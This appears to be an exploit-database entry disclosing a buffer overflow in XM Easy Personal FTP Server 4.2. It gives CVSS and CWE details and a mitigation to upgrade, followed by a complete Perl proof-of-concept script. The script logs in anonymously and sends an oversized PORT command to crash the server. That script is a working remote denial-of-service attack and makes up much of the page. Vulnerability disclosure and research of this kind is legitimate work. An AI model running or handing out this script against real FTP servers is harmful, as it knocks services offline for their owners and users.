XM Easy Personal FTP Server 4.2 - PoC Exploit

vendor:

XM Easy Personal FTP Server

by:

luka.research

7.5

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: XM Easy Personal FTP Server

Affected Version From: 4.2

Affected Version To: 4.2

Patch Exists: YES

Related CWE: N/A

CPE: a:xm_easy_software:xm_easy_personal_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

XM Easy Personal FTP Server 4.2 – PoC Exploit

A buffer overflow vulnerability exists in XM Easy Personal FTP Server 4.2 due to insufficient validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted PORT command with a huge value, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of XM Easy Personal FTP Server.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# ---------------------------------------------------- #
# Name        : XM Easy Personal FTP Server            #
# Version     : 4.2                                    #
# ---------------------------------------------------- #
#	Type        : dos / remote 	               #
# Descritpion : buffer overflow for huge PORT value    #
# ---------------------------------------------------- #
# luka.research - id:28022006001                       #
# ---------------------------------------------------- #

use Net::FTP;

$host = @ARGV[0];

if ($host)
{
	$ftp = Net::FTP->new($host, Debug => 0);
	$ftp->login("anonymous",'me@here.there');
	$ftp->port("\x41"x9999);
}         
else {
	print "\n- XM Easy Personal FTP Server 4.2 - PoC Exploit\n- Using: $0 host\n"; 
}  

# milw0rm.com [2006-03-04]